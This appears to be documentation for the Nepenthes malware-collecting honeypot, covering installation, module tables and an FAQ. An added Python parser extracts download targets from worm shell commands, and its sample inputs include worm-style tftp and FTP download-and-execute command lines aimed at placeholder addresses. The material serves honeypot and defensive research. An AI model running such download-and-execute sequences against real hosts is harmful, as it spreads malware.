Nepenthes is a low-interaction honeypot like honeyd or mwcollect. Low-interaction honeypots emulate _known_ vulnerabilities to collect information about potential attacks. Nepenthes is designed to emulate the vulnerabilities worms use to spread, and to capture these worms. As there are many possible ways for worms to spread, Nepenthes is modular. There are module interfaces to
Refer to the Module Interface documentation for more information.
Nepenthes vulnerability modules require knowledge about the weakness they emulate, so one can draft a Dialogue: how the worm will exploit the weakness, which information is needed to download the file, and how to send the attacker just enough of a response that it does not notice it is being fooled.
On the other hand, Nepenthes is quite useful for capturing new exploits for old vulnerabilities.
As Nepenthes does not know these exploits, they will show up in the logfiles.
By replaying these captures against a real vulnerable machine one can learn how the exploit works and start writing a Nepenthes Dialogue for it.
The first argument is that it is free: the software is free, and the worms you capture are free. You can collect this annoying stuff like stamps without paying a dime. The remaining arguments are security related and debatable. Setting up a host running Nepenthes can improve network security considerably, as you can see who scans for which known vulnerabilities.
If you update an existing install, please read the section on updating the config files, else you may miss something and break your install.
Check the download section before trying to compile Nepenthes from source; there are prebuilt or preconfigured packages for
The configure script checks whether your system satisfies the needed dependencies.
required:
optional:
On Debian the dependencies are installed with
apt-get install libcurl3-dev libmagic-dev libpcre3-dev libadns1-dev libpcap0.8-dev iptables-dev
SuSE (10) needs you to
apt-get install libadns
apt-get install libadns-devel
apt-get install file-devel
apt-get install pcre-devel
apt-get install pcre
apt-get install curl
apt-get install curl-devel
and once again as a single line for easy pasting
apt-get install libadns libadns-devel file-devel pcre-devel pcre curl curl-devel
TODO: find out the package names for pcap and iptables-dev on SuSE.
Fedora Core is pretty easy again.
yum install pcre-devel pcre adns adns-devel curl curl-devel file
TODO: find out the package names for pcap and iptables-dev on FC.
For Nepenthes v0.2.0 under FC6 you need, starting from a base install (i.e. the core package group only):
yum update
yum install subversion automake libtool flex bison gcc gcc-c++ curl curl-devel pcre pcre-devel adns adns-devel file libpcap libpcap-devel iptables-devel
On OS X you need to install updated autotools with DarwinPorts:
sudo port install libtool # libtoolize
sudo port install autoconf
sudo port install automake
Install the dependencies as well:
sudo port install adns
sudo port install pcre
sudo port install file # for libmagic
sudo port install curl
Installing the dependencies from ports (dns/adns, ftp/curl, devel/pcre) worked for me.
In order to run Nepenthes on OpenBSD you should be running 4.0 or later. You can use ports or packages.
If you choose to use ports, you will build Nepenthes from source. Assuming you have the ports tree checked out in /usr/ports, proceed with:
shell> cd /usr/ports/net/nepenthes
shell> make
shell> sudo make install
If you want to know how to fetch the ports tree, take a look at: http://www.openbsd.org/anoncvs.html
If you choose to use packages (pre-compiled binaries), you should fetch libmagic-4.23.tgz and nepenthes-0.2.2.tgz from:
ftp://ftp.openbsd.org/pub/OpenBSD/<release>/packages/<arch>/
<release> should be replaced by the number of the release you’re running (3.9, 4.0, etc.) or by ‘snapshots’ if you’re running -current.
<arch> should be replaced by the architecture you wish to install Nepenthes on (i386, sparc64, etc.). This port is known to work on the following archs: i386, amd64, sparc64 and macppc.
and then install with:
shell> sudo pkg_add libmagic-4.23.tgz
shell> sudo pkg_add nepenthes-0.2.2.tgz
If there are any issues, please contact the port maintainer.
Installing the dependencies adns, curl, pcre and file from pkg worked for me.
Compiling Nepenthes >= 0.1.6 on Windows using Cygwin is possible. Installing
from Cygwin worked for me. Some packages will pull in their own dependencies.
Get it
wget http://www.chiark.greenend.org.uk/~ian/adns/adns.tar.gz
unpack it
tar xfz adns.tar.gz
cd adns-1.1
configure & compile
./configure --prefix=/usr
make
This will fail when linking the adns client; we have to copy the created library by hand and run make again:
cd dynamic
cp libadns.so libadns.dll
cd ..
make
then install the pieces and put the DLL where Cygwin finds it:
for d in src dynamic client regress; do make -C $d install; done
cp dynamic/libadns.dll /bin/libadns.dll
Now adns needs the /etc/resolv.conf file, so we have to create it. First check your nameserver's IP:
ipconfig /all | grep DNS-Server
(the label is locale dependent; an English Windows prints “DNS Servers”) will give you something like
DNS-Server. . . . . . . . . . . . : 194.25.2.129
Use your real nameserver, not the value from this example.
echo nameserver 194.25.2.129 > /etc/resolv.conf
and test the resolver:
adnshost kernel.org
kernel.org A INET 204.152.191.5
kernel.org A INET 204.152.191.37
You can download a source package, or get the latest code from the svn repository.
Svn offers the latest version, but it may not build properly, may have bugs, and requires some additional time reading the install guide as well as additional software.
If you think you can handle it, we recommend using svn; if you hit a bug, you can help us fix it by filing a bug report. But using svn is not that easy, as the svn snapshot does not contain the pre-generated autoconf files; you have to create them yourself with the autotools, as described below.
Some operating systems (FreeBSD 6.0 for example) ship broken autotools; I was unable to get the shipped autotools to create the required files, so using svn may be tricky on some operating systems.
Others (debian for example) make using autotools very easy
apt-get install autoconf automake1.9 autotools-dev libtool
For more information about autoconf we recommend the autoconf docs.
If you “svn checkout” a repository, you can update this checkout incrementally with “svn update”, so you don't need to download the complete source again when just some lines changed.
“svn export” does not allow incremental updates, but uses less disk space than a checkout, as the checkout stores additional data (a local pristine copy of the whole source).
So whichever you want to run, it's up to you.
svn checkout https://svn.mwcollect.org/nepenthes/trunk/ nepenthes
cd nepenthes
Now we have to run the famous autotools to get the “./configure” file we’ll need to install it.
autoreconf -v -i --force
What happens when doing this is ... sometimes a picture says more than words.
configure.ac --.
               |   .------> autoconf* -----> configure
[aclocal.m4] --+---+
               |   `-----> [autoheader*] --> [config.h.in]
[acsite.m4] ---'
(taken from the autoconf 2.57 manual)
The configure on the right side is what we get as a result.
On OS X with DarwinPorts the autotools live in /opt/local:
/opt/local/bin/autoreconf -v -i --force
As you can imagine, this does not work everywhere. FreeBSD is special, so special that for a long time I was unable to autoreconf the svn checkout on a FreeBSD host myself, and so special that I had no real motivation to look into it, as everything that depends on automake really sucks .....
But today I got mail describing how to get it working on FreeBSD:
For what it's worth, here's what I did to build the current SVN code on FreeBSD 6.0. I thought we might want to add this to the wiki:
# -- checkout code && cd to src directory --
# /usr/local/bin/libtoolize --copy --force
# /usr/local/bin/aclocal19 --force
# cat /usr/local/share/aclocal/libtool.m4 >>aclocal.m4
# /usr/local/bin/autoheader259 --force
# /usr/local/bin/automake19 -ai
# /usr/local/bin/autoconf259 -f
# ./configure
# make
I'm sure this isn't the minimal set of operations, but it works ;)
Check the project's file release repository on SourceForge and download the latest version.
Unpack your source tarball.
if you got a bzip2 package use
tar vxjf nepenthes-VERSION.tar.bz2
else
tar vxzf nepenthes-VERSION.tar.gz
From time to time things show up that have to be fixed.
Patches are made relative to the source root, so you can apply them from inside the source directory with
cd nepenthes-VERSION
patch -p0 < ../example_patch.diff
There are two kinds of patches: bugfix patches, which you need as we made mistakes :\, and patches that add additional features, which we recommend.
Starting with 0.1.6 every dependency can be given its own path. If you have everything in its normal path (we ignore FreeBSD's definition of normal path here), you won't need this, but if you need it, you won't want to miss it.
For example
./configure \
  --with-curl-include=/opt/curl/include/ \
  --with-curl-lib=/opt/curl/lib/ \
  --with-adns-include=/opt/adns/include/ \
  --with-adns-lib=/opt/adns/lib/ \
  --with-pcre-include=/opt/pcre/include/ \
  --with-pcre-lib=/opt/pcre/lib/ \
  --with-magic-include=/opt/file/include/ \
  --with-magic-lib=/opt/file/lib/ \
  --prefix=/opt/nepenthes
Check
./configure --help
for the full list of options if you rely on user-defined paths.
This worked for me on Debian, Fedora Core 4 and SuSE 10:
./configure --prefix=/opt/nepenthes
make
make install
On OS X (DarwinPorts prefix /opt/local):
./configure \
  --libdir=/opt/local/lib \
  --includedir=/opt/local/include/ \
  --prefix=/opt/nepenthes
make
make install
Some dependencies (curl, pcre) hide in /usr/pkg/, so we have to pass this path; passing it once is enough.
./configure --prefix=/opt/nepenthes \
  --with-curl-include=/usr/pkg/include --with-curl-lib=/usr/pkg/lib
make
make install
Cygwin's g++ is a little special and won't compile the source out of the box, so we have to tweak it.
./configure --prefix=/opt/nepenthes --with-adns-lib=/bin
make
This *will* quit with
/usr/lib/gcc/i686-pc-cygwin/3.4.4/include/c++/bits/stl_uninitialized.h: In member function `virtual int32_t nepenthes::VFSCommandCMD::run(std::vector<std::string, std::allocator<std::string> >*)':
/usr/lib/gcc/i686-pc-cygwin/3.4.4/include/c++/bits/stl_uninitialized.h:82: warning: '__cur' might be used uninitialized in this function
make[3]: *** [VFSCommandCMD.lo] Error 1
make[3]: Leaving directory `/home/foobar/Svn/nepenthes/trunk/modules/shellemu-winnt'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/home/foobar/Svn/nepenthes/trunk/modules'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/home/foobar/Svn/nepenthes/trunk'
make: *** [all] Error 2
Actually this is not Nepenthes' fault but Cygwin's g++, and the error is not critical: the build fails only because the compiler wants to warn us about a *possible* problem, and the Makefile.am says -Werror (treat warnings as errors).
So, open modules/shellemu-winnt/Makefile.am with an editor of your choice, and change
AM_CXXFLAGS = -Wall -Werror
to
AM_CXXFLAGS = -Wall
this will still show the warning, but won’t treat it as error any longer.
then finish it
make
make install
cd /opt/nepenthes
less etc/nepenthes/nepenthes.conf
less etc/nepenthes/submit-norman.conf
less etc/nepenthes/log-irc.conf
’less’ means you should have a look at the config file and edit it with an editor of your choice.
If something fails, check the Trouble Shooting section. Compiling Nepenthes can take some time; here it takes about 1:20 minutes on an amd64 3500 CPU with one GB of RAM.
Nepenthes won't overwrite your existing config files on make install. That means if you update to a new version and don't take care of updating the configs, you may break your install.
As of 0.1.7 there is a real need to do this.
There are at least two ways of verifying your config still works.
If you run the default config without any changes, just remove the etc/nepenthes dir and run make install again; it will copy the new versions of all config files.
If you tweaked your config, this is the way to go: get this shell script and call it with the unpacked source tree and the install prefix, like
./diffconfigs.sh /tmp/nepenthes-0.1.7 /opt/nepenthes
#!/bin/sh
# usage: diffconfigs.sh <unpacked source tree> <install prefix>
SRCDIR=$1
INSTALLDIR=$2/etc/nepenthes
# every *.conf.dist shipped with the source, skipping svn metadata
for i in $(find "$SRCDIR" -name '*.conf.dist' ! -path '*/.svn/*'); do
    CFGNAME=$(basename "$i" | sed 's/\.dist$//')
    if [ ! -f "$INSTALLDIR/$CFGNAME" ]; then
        # a config file the installed version does not have yet
        printf '\033[31mmissing %s (new in this release, copy it from %s)\033[0m\n' "$INSTALLDIR/$CFGNAME" "$i"
        continue
    fi
    DIFFBYTES=$(diff "$i" "$INSTALLDIR/$CFGNAME" | wc -c)
    if [ "$DIFFBYTES" -gt 0 ]; then
        printf '\033[31mdiff %s %s (%s bytes difference)\033[0m\n' "$i" "$CFGNAME" "$DIFFBYTES"
        diff "$i" "$INSTALLDIR/$CFGNAME"
    fi
done
If everything went fine, run nepenthes.
bin/nepenthes
All in all Nepenthes is stable code, but some things are ... let's say a little raw.
Current status: everything marked “works” runs fine.
Core components:
| Component | Status | Comment |
|---|---|---|
| Config File | works | - |
| SocketManager | works | TCP and UDP connections, nonblocking, buffered; no real raw socket support |
| ShellcodeManager | works | - |
| SubmitManager | works | - |
| EventManager | works | - |
| LuaInterface | planned?/dropped? | - |
| ModuleManager | works | unloading modules at runtime is not really possible, as it is really hard to make sure there is no shared code left |
| DNSManager | works | i love this one |
| GeoLocationManager | works | was a hack to draw maps with dots where the attacker may be located, but the homies love it |
Download handlers:
| Name | Protocol | Status | Comment |
|---|---|---|---|
| download_csend | csend | works | |
| download_curl | http/ftp | works | not recommended |
| download_tftp | tftp | works | |
| download_nepenthes | own | works | |
| download_ftp | ftp | works | can even do active FTP behind NAT |
| download_http | http | works | |
| download_rcp | rcp | should work | the protocol sucks |
| download_link | linkbot | works | pretty smart thing |
| download_creceive | creceive | works | |
Submit handlers:
| Name | Status | Description |
|---|---|---|
| submit_file | works | writes captured binaries to the local disk |
| submit_norman | works | submits files to Norman's online sandbox |
| submit_nepenthes | works | submits files to another box running Nepenthes |
| submit_postgres | works | submits binaries to a PostgreSQL database server |
| submit_xmlrpc | works | submits files to an XML-RPC server |
| submit_gotek | works | submits files to a gotek server |
Shellcode handlers:
| Name | Status | Comment |
|---|---|---|
| sch_generic_createprocess | old | to be removed |
| sch_generic_url | old | to be removed |
| sch_generic_xor | old | to be removed |
| sch_generic_linkxor | old | to be removed |
| sch_generic_stuttgart | old | to be removed |
| sch_generic_link_trans | old | to be removed |
| sch_generic_link_bind_trans | old | to be removed |
| sch_namespace | testing | tomorrow today |
| sch_engine_unicode | testing | tomorrow today |
Vulnerability modules (a port with several modules is listed once per module; a blank Vulnerability cell means no MS bulletin applies):
| Port | Vulnerability | Module |
|---|---|---|
| 42 | MS04-006, MS04-045 | vuln_wins |
| 80 | MS03-007, MS03-051, MS04-011 | vuln_asn1 |
| 135 | MS03-039, MS04-012 | vuln_dcom |
| 139 | | vuln_netbiosname |
| 139 | MS04-031 | vuln_netdde |
| 443 | | vuln_iis |
| 445 | | vuln_asn1 |
| 445 | MS04-011 | vuln_lsass |
| 445 | MS04-012, MS03-039 | vuln_dcom |
| 1023 | | vuln_sasserftpd |
| 1025 | | vuln_dcom |
| 1434 | MS02-039 | vuln_mssql |
| 2103 | MS05-017 | vuln_msmq |
| 2105 | MS05-017 | vuln_msmq |
| 2107 | MS05-017 | vuln_msmq |
| 2745 | | vuln_bagle |
| 3127 | | vuln_mydoom |
| 3140 | | vuln_optix |
| 5000 | MS01-059 | vuln_upnp |
| 5554 | | vuln_sasserftpd |
| 17300 | | vuln_kuang2 |
| 27347 | | vuln_sub7 |
shellemu-winnt
status: works
description: provides a Windows NT shell emulation supporting all commands one needs to download a file.
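Drafting a Dialogue, as described at the top of this page, means knowing what the worm will type once it has a shell, so the emulation can answer with exactly what the worm expects while pulling the download target out of the conversation. The following is an added example (not Nepenthes code) written in Python for this page: it performs that extraction step over command lines of the kind shellemu-winnt sees, tracking the `echo ... > script` lines that build an FTP script, the `ftp -n -s:script` call that runs it, and the one-line `tftp -i host GET file` form, and then reports which of the downloaded files the command line executes. The sample command lines, file names and 192.0.2.x addresses are constructed for the example and are not captured traffic.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class Download:
    protocol: str                               # "tftp" or "ftp"
    host: str
    port: int
    files: List[str] = field(default_factory=list)


# cmd.exe chains commands with "&" or "&&"
_SPLIT = re.compile(r"\s*&&?\s*")
# "echo <text> > script" creates the script file, ">>" appends a line to it
_ECHO = re.compile(r"^echo\s+(.*?)\s*(>>|>)\s*(\S+)$", re.I)
# "tftp -i <host> GET <file>"  (-i selects binary transfer mode)
_TFTP = re.compile(r"^tftp\s+(?:-i\s+)?(\S+)\s+get\s+(\S+)", re.I)
# "ftp -n -s:<script>" runs the ftp commands stored in <script>
_FTP = re.compile(r"^ftp\b.*?-s:(\S+)", re.I)


def split_commands(cmdline: str) -> List[str]:
    return [c.strip() for c in _SPLIT.split(cmdline) if c.strip()]


def _parse_ftp_script(lines: List[str]) -> Download:
    """Pull host, port and requested files out of the lines of an ftp -s script."""
    dl = Download("ftp", "", 21)
    for line in lines:
        tok = line.split()
        if not tok:
            continue
        verb = tok[0].lower()
        if verb == "open" and len(tok) >= 2:
            dl.host = tok[1]
            if len(tok) >= 3 and tok[2].isdigit():
                dl.port = int(tok[2])
        elif verb in ("get", "mget") and len(tok) >= 2:
            dl.files.extend(tok[1:])
    return dl


def extract_downloads(cmdline: str) -> List[Download]:
    """Return every file transfer the command line would perform, in order."""
    scripts: Dict[str, List[str]] = {}
    found: List[Download] = []
    for cmd in split_commands(cmdline):
        m = _ECHO.match(cmd)
        if m:
            text, op, name = m.groups()
            if op == ">":
                scripts[name] = [text]            # truncate and (re)create
            else:
                scripts.setdefault(name, []).append(text)
            continue
        m = _TFTP.match(cmd)
        if m:
            found.append(Download("tftp", m.group(1), 69, [m.group(2)]))
            continue
        m = _FTP.match(cmd)
        if m and m.group(1) in scripts:
            found.append(_parse_ftp_script(scripts[m.group(1)]))
    return found


def executed_downloads(cmdline: str) -> List[str]:
    """Downloaded file names that the same command line also runs."""
    fetched = {f.lower() for d in extract_downloads(cmdline) for f in d.files}
    ran: List[str] = []
    for cmd in split_commands(cmdline):
        tok = cmd.split()
        if len(tok) > 1 and tok[0].lower() == "start":
            tok = tok[1:]
        if tok and tok[0].lower() in fetched and tok[0] not in ran:
            ran.append(tok[0])
    return ran


# Constructed samples (documentation-range addresses), not captured traffic.
SAMPLE_TFTP = "tftp -i 192.0.2.10 GET dl.exe & start dl.exe"
SAMPLE_FTP = ("echo open 192.0.2.20 2121 > o & echo user a b >> o & echo binary >> o "
              "& echo get msgr.exe >> o & echo bye >> o & ftp -n -s:o & msgr.exe & del o")

if __name__ == "__main__":
    for sample in (SAMPLE_TFTP, SAMPLE_FTP):
        for d in extract_downloads(sample):
            print(f"{d.protocol}://{d.host}:{d.port} -> {', '.join(d.files)}")
        print("executed:", executed_downloads(sample))
```

The point of keeping the echo lines as a per-script buffer rather than matching the whole command line with one regex is that the worm decides what the FTP script is called and in which order it writes the lines; only once `ftp -s:` names the script do we know which buffer to read. A download handler like download_tftp or download_ftp would then be handed the host, port and file name.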
eXample modules:
| Name | Status | Feature |
|---|---|---|
| eXample 1 | works | writing a module |
| eXample 2 | works | accepting connections, creating dialogues; *the* module to start from when writing a vuln emulation |
| eXample 3 | works | download handler example, downloads files from /dev/urandom |
| eXample 4 | works | submit handler example, hexdumps downloaded files to stdout |
| eXample 5 | works | event handler example, hooks some events |
| eXample 6 | works | DNS callback example, resolves some names asynchronously |
| eXample 7 | dropped | raw sockets example, dropped |
| eXample 8 | works | geolocation example, resolves the geolocation of some IPs |
Geolocation modules:
| Name | Status | Comment |
|---|---|---|
| geolocation_hostip | | |
| geolocation_geoip | | |
| geolocation_ip2location | | |
DNS resolver modules:
| Name | Status | Comment |
|---|---|---|
| dnsresolve_adns | works | resolves names using libadns |
| dnsresolve_uns | planned | resolves names using libudns |
Refer to the online doxygen documentation of the eXample modules.
Post suggestions, bugs, patches and new modules to nepenthes.sf.net or mail them to nepenthesdev@gmail.com
If you want to donate hardware, IP ranges, whatever, mail us.
P: It does not work! S: find out why it does not work
P: the makefiles suck S: send us a patch using the auto(conf|make) foobar we are unable to use.
P: compiling fails
S: Google for it; if this does not help, file a bug report and mention your
- operating system version
- g++ version
- libcurl version
- libpcre version
- libmagic version
and paste the compiler error too.
P: nepenthes leaks memory
S: first verify it _is_ a memory leak: currently all downloaded files are kept in memory until they are completely downloaded and submitted. Then run nepenthes under valgrind
valgrind --num-callers=12 --tool=memcheck --leak-check=yes --leak-resolution=high --show-reachable=yes -v --logfile=valg bin/nepenthes
and mail us the valgrind logfiles to nepenthesdev@gmail.com, or fix the memory leak and post the patch to http://sf.net/projects/nepenthes
P: I don't get any incoming connections! S: verify you are not firewalled.
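The quickest way to verify you are not firewalled is to probe the ports from the vulnerability module table above from a host outside the honeypot's network and confirm that each one accepts a connection. This is an added example for this page (not Nepenthes code), written in Python: a TCP connect probe over the ports in that table. A refused connection means the packet reached the host but nothing is listening (Nepenthes not running, or not bound to that port), while a connection that times out means something in between is dropping packets. Port 1434 (MS02-039) is left out because that vector is UDP and a TCP connect says nothing about it. The `NEPENTHES_TCP_PORTS` list, the `open_local_listener` helper and the loopback target are this example's own.

```python
import socket
from typing import Dict, Iterable, List, Tuple

# TCP ports from the vulnerability module table. 1434/tcp is omitted: the
# MS02-039 (SQL Slammer) vector is UDP, which a TCP connect cannot check.
NEPENTHES_TCP_PORTS = [42, 80, 135, 139, 443, 445, 1023, 1025, 2103, 2105,
                       2107, 2745, 3127, 3140, 5000, 5554, 17300, 27347]


def probe_port(host: str, port: int, timeout: float = 2.0) -> str:
    """Return "open", "closed" (RST received), "filtered" (no answer) or "error"."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        return "open"
    except socket.timeout:
        # the SYN went unanswered: a firewall in between is dropping it
        return "filtered"
    except ConnectionRefusedError:
        # the host answered with a RST: reachable, but nothing listening
        return "closed"
    except OSError:
        # unreachable network, name resolution failure, ...
        return "error"
    finally:
        sock.close()


def probe_ports(host: str, ports: Iterable[int], timeout: float = 2.0) -> Dict[int, str]:
    return {port: probe_port(host, port, timeout) for port in ports}


def missing_ports(results: Dict[int, str]) -> List[int]:
    """Ports that did not accept a connection, sorted."""
    return sorted(port for port, state in results.items() if state != "open")


def open_local_listener() -> Tuple[socket.socket, int]:
    """Listen on an ephemeral loopback port, to sanity-check the probe itself."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    results = probe_ports(target, NEPENTHES_TCP_PORTS)
    for port in NEPENTHES_TCP_PORTS:
        print(f"{port:>6}/tcp  {results[port]}")
    bad = missing_ports(results)
    print("all emulated ports reachable" if not bad else f"not reachable: {bad}")
```

Run it as `python probe.py <honeypot address>` from a machine on the other side of whatever filters you suspect; a list of "filtered" results that turns into "open" when run from the honeypot itself is the firewall, while "closed" everywhere points at Nepenthes not listening on that port (check the module's configuration in etc/nepenthes).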
Q: Is this the official FAQ? A: Yes.
Q: Why choose Nepenthes as the name? A: read http://en.wikipedia.org/wiki/Nepenthes
Q: What do you do with the samples committed to the nepenthes central server? A: We collect them. All samples are submitted to ClamAV. Some samples get analysed.
Q: Can I get access to your malware database? A: In general, no. If you think you can persuade us that you should have access, as you are an AV product vendor or do research in this field, mail us at samples@stargazer.at. Currently we _lack_ hardware and connectivity for a central server.
Q: I want to write my own modules, will you publish them? A: Depends. If the module adds new features - shellcode handler - download handler - submit handler - vulnerability module - and you are willing to accept the GPL license, there is a really good chance that we will. Of course, the feature also has to be useful. Submitting files to /dev/null can't be considered a good feature.
Q: Why don't you write the whole documentation in English? A: Although we know our English is poor, we think it's more useful to write poor English than to write good Russian. Send us patches fixing this issue.
Q: Isn't autocommitting files to sandbox.norman.no a bad idea? A: So far we have committed about 400 files and nobody has complained yet, and we like getting the results via mail.
Q: How can I autocommit to ClamAV? A: ClamAV does not want to be the victim of autocommits; if you use submit-nepenthes, our central server will commit the files for you.
Q: How can I see whether the file I submitted to your central server has got a ClamAV signature? A: Wait some time and then scan the file using clamscan.
Q: Why should I run nepenthes? A: You improve security in various ways, which we can discuss over a beer.
Q: There is nothing in the cvs repository on sourceforge.net A: We use svn as we don't like cvs.
Q: Can I get access to the svn? A: So far no, as the svn is 'hosted' on a dialup.
Q: I get Got signal 25 Exit 'cause of 25 A: Signal 25 is SIGXFSZ, which means the file size limit was exceeded, and mainly refers to the logfiles located in log/. rm them, rotate them, just get rid of them, and it will work again. Fixed in 0.1.1.
Q: My AV scanner complains about a virus in the nepenthes source package, like: clamscan nepenthes-0.1.1.tar.gz: Trojan.Downloader.FTP.Gen-4 FOUND A: Actually this is not a false positive, but on the other hand it is: the tarball contains the file doc/README.VFS, which for documentation purposes contains the widely used batch jobs worms use to download and execute themselves on a remote host once they have gained a shell. So your virus scanner is doing its job if it recognizes the file as a virus, but this single file does not make Nepenthes a virus. As we don't want to weaken AV scanners we won't ask them to remove this signature.
In my opinion the signature is very good; using such an AV signature on a snort_inline firewall can stop attacks in the last stage, after successful exploitation, before infecting the host.
Q: What's the problem with g++ 4.0.1? A: It will compile, and maybe even start, but it will fail if you resolve DNS asynchronously; for some reason the destructor of list<unsigned long> segfaults the program. To me this is a g++ 4 bug.
Q: What about OS X, or _any_ other big-endian architecture? A: We guess it will compile, but we never had a look at endianness in any shellcode handler. Actually we can't say whether it will work on big-endian boxes, and as we do not own any big-endian machine, we can't debug and fix it. If you want to donate an OS X box so we can support big endian, mail us for a delivery address.
Q: Nepenthes fails to start and gives the error message
[ crit mgr module ] Failed to load library "lib/nepenthes/shellcodesignatures.so": lib/nepenthes/shellcodesignatures.so: undefined symbol: yytext
A: Make sure you've installed flex and bison (or lex and yacc). If you don't have both, delete the following files
- modules/shellcode-signatures/signature_scanner.c
- modules/shellcode-signatures/signature_parser.h
- modules/shellcode-signatures/signature_parser.c
Afterwards install flex and bison, re-run ./configure, recompile and pray. If this didn't fix your problem, please contact us on the mailing list.